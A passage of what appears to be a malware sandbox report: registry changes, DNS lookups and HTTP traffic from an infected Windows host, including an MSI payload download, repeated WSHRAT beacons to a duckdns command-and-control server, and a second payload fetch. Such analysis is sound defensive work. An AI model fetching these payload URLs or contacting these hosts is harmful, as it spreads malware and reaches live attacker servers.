  1062.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
  1063.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
  1064.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
  1065.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
  1066.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
  1067.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
  1068.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
  1069.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
  1070.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
  1071.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
  1072.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
  1073.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
  1074.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
  1075.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
  1076.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
  1077.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
  1078.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
  1079.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
  1080.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
  1081.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
  1082.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
  1083.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
  1084.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
  1085.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
  1086.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
  1087.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
  1088.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
  1089.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1090.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1091.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
  1092.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
  1093.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
  1094.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
  1095.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
  1096.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
  1097.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
  1098.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  1099.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  1100.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  1101.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
  1102.     "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
  1103.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
  1104.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
  1105.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
  1106.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
  1107.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
  1108.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
  1109.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
  1110.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
  1111.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
  1112.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
  1113.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
  1114.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
  1115.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
  1116.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
  1117.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
  1118.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
  1119.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
  1120.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
  1121.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
  1122.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
  1123.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
  1124.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
  1125.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
  1126.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
  1127.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
  1128.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
  1129.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
  1130.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
  1131.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
  1132.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
  1133.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
  1134.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
  1135.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
  1136.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
  1137.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
  1138.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
  1139.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
  1140.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
  1141.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
  1142.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
  1143.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
  1144.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
  1145.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
  1146.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
  1147.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
  1148.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
  1149.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
  1150.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
  1151.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
  1152.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
  1153.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
  1154.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
  1155.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
  1156.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
  1157.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893"
  1158. ]
  1159.  
  1160. [*] Deleted Registry Keys: [
  1161.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\kqf",
  1162.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\87d",
  1163.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  1164.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  1165.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  1166.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate"
  1167. ]
  1168.  
  1169. [*] DNS Communications: [
  1170.     {
  1171.         "type": "A",
  1172.         "request": "paroquiadamarinhagrande.pt",
  1173.         "answers": [
  1174.             {
  1175.                 "data": "188.93.230.15",
  1176.                 "type": "A"
  1177.             }
  1178.         ]
  1179.     },
  1180.     {
  1181.         "type": "A",
  1182.         "request": "ipapi.co",
  1183.         "answers": [
  1184.             {
  1185.                 "data": "104.25.210.99",
  1186.                 "type": "A"
  1187.             },
  1188.             {
  1189.                 "data": "104.25.209.99",
  1190.                 "type": "A"
  1191.             }
  1192.         ]
  1193.     },
  1194.     {
  1195.         "type": "A",
  1196.         "request": "unknownsoft.duckdns.org",
  1197.         "answers": [
  1198.             {
  1199.                 "data": "185.247.228.14",
  1200.                 "type": "A"
  1201.             }
  1202.         ]
  1203.     },
  1204.     {
  1205.         "type": "A",
  1206.         "request": "vemvemserver.duckdns.org",
  1207.         "answers": [
  1208.             {
  1209.                 "data": "103.136.43.131",
  1210.                 "type": "A"
  1211.             }
  1212.         ]
  1213.     },
  1214.     {
  1215.         "type": "A",
  1216.         "request": "ocsp.comodoca4.com",
  1217.         "answers": [
  1218.             {
  1219.                 "data": "t3j2g9x7.stackpathcdn.com",
  1220.                 "type": "CNAME"
  1221.             },
  1222.             {
  1223.                 "data": "151.139.128.14",
  1224.                 "type": "A"
  1225.             }
  1226.         ]
  1227.     },
  1228.     {
  1229.         "type": "A",
  1230.         "request": "doughnut-snack.live",
  1231.         "answers": [
  1232.             {
  1233.                 "data": "172.245.14.10",
  1234.                 "type": "A"
  1235.             }
  1236.         ]
  1237.     }
  1238. ]
  1239.  
  1240. [*] Domains: [
  1241.     {
  1242.         "ip": "188.93.230.15",
  1243.         "domain": "paroquiadamarinhagrande.pt"
  1244.     },
  1245.     {
  1246.         "ip": "172.245.14.10",
  1247.         "domain": "doughnut-snack.live"
  1248.     },
  1249.     {
  1250.         "ip": "151.139.128.14",
  1251.         "domain": "ocsp.comodoca4.com"
  1252.     },
  1253.     {
  1254.         "ip": "103.136.43.131",
  1255.         "domain": "vemvemserver.duckdns.org"
  1256.     },
  1257.     {
  1258.         "ip": "185.247.228.14",
  1259.         "domain": "unknownsoft.duckdns.org"
  1260.     },
  1261.     {
  1262.         "ip": "104.25.210.99",
  1263.         "domain": "ipapi.co"
  1264.     }
  1265. ]
  1266.  
  1267. [*] Network Communication - ICMP: []
  1268.  
  1269. [*] Network Communication - HTTP: [
  1270.     {
  1271.         "count": 1,
  1272.         "body": "",
  1273.         "uri": "http://paroquiadamarinhagrande.pt/app/hmvrch.msi",
  1274.         "user-agent": "Windows Installer",
  1275.         "method": "GET",
  1276.         "host": "paroquiadamarinhagrande.pt",
  1277.         "version": "1.1",
  1278.         "path": "/app/hmvrch.msi",
  1279.         "data": "GET /app/hmvrch.msi HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Windows Installer\r\nHost: paroquiadamarinhagrande.pt\r\n\r\n",
  1280.         "port": 80
  1281.     },
  1282.     {
  1283.         "count": 1,
  1284.         "body": "",
  1285.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
  1286.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1287.         "method": "GET",
  1288.         "host": "ocsp.digicert.com",
  1289.         "version": "1.1",
  1290.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
  1291.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nCache-Control: max-age = 89056\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 18:30:24 GMT\r\nIf-None-Match: \"5c9529c0-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1292.         "port": 80
  1293.     },
  1294.     {
  1295.         "count": 1,
  1296.         "body": "",
  1297.         "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
  1298.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1299.         "method": "GET",
  1300.         "host": "ocsp.msocsp.com",
  1301.         "version": "1.1",
  1302.         "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
  1303.         "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
  1304.         "port": 80
  1305.     },
  1306.     {
  1307.         "count": 43,
  1308.         "body": "",
  1309.         "uri": "http://vemvemserver.duckdns.org:1425/is-ready",
  1310.         "user-agent": "WSHRAT|C1C5B64F|Host|user|Microsoft Windows 7 Enterprise N |plus|nan-av|false - 18/6/2019|JavaScript-v1.3",
  1311.         "method": "POST",
  1312.         "host": "vemvemserver.duckdns.org:1425",
  1313.         "version": "1.1",
  1314.         "path": "/is-ready",
  1315.         "data": "POST /is-ready HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: WSHRAT|C1C5B64F|Host|user|Microsoft Windows 7 Enterprise N |plus|nan-av|false - 18/6/2019|JavaScript-v1.3\r\nAccept-Encoding: gzip, deflate\r\nHost: vemvemserver.duckdns.org:1425\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1316.         "port": 1425
  1317.     },
  1318.     {
  1319.         "count": 1,
  1320.         "body": "",
  1321.         "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  1322.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1323.         "method": "GET",
  1324.         "host": "ocsp.usertrust.com",
  1325.         "version": "1.1",
  1326.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  1327.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
  1328.         "port": 80
  1329.     },
  1330.     {
  1331.         "count": 1,
  1332.         "body": "",
  1333.         "uri": "http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
  1334.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1335.         "method": "GET",
  1336.         "host": "ocsp.comodoca4.com",
  1337.         "version": "1.1",
  1338.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
  1339.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca4.com\r\n\r\n",
  1340.         "port": 80
  1341.     },
  1342.     {
  1343.         "count": 1,
  1344.         "body": "",
  1345.         "uri": "http://doughnut-snack.live/bpvpl.tar.gz",
  1346.         "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1347.         "method": "GET",
  1348.         "host": "doughnut-snack.live",
  1349.         "version": "1.1",
  1350.         "path": "/bpvpl.tar.gz",
  1351.         "data": "GET /bpvpl.tar.gz HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nCache-Control: max-age=0\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: doughnut-snack.live\r\nConnection: Keep-Alive\r\n\r\n",
  1352.         "port": 80
  1353.     },
  1354.     {
  1355.         "count": 1,
  1356.         "body": "",
  1357.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  1358.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1359.         "method": "GET",
  1360.         "host": "ocsp.digicert.com",
  1361.         "version": "1.1",
  1362.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  1363.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1364.         "port": 80
  1365.     },
  1366.     {
  1367.         "count": 1,
  1368.         "body": "",
  1369.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  1370.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1371.         "method": "GET",
  1372.         "host": "ocsp.digicert.com",
  1373.         "version": "1.1",
  1374.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  1375.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1376.         "port": 80
  1377.     },
  1378.     {
  1379.         "count": 1,
  1380.         "body": "",
  1381.         "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
  1382.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1383.         "method": "GET",
  1384.         "host": "ocsp.pki.goog",
  1385.         "version": "1.1",
  1386.         "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
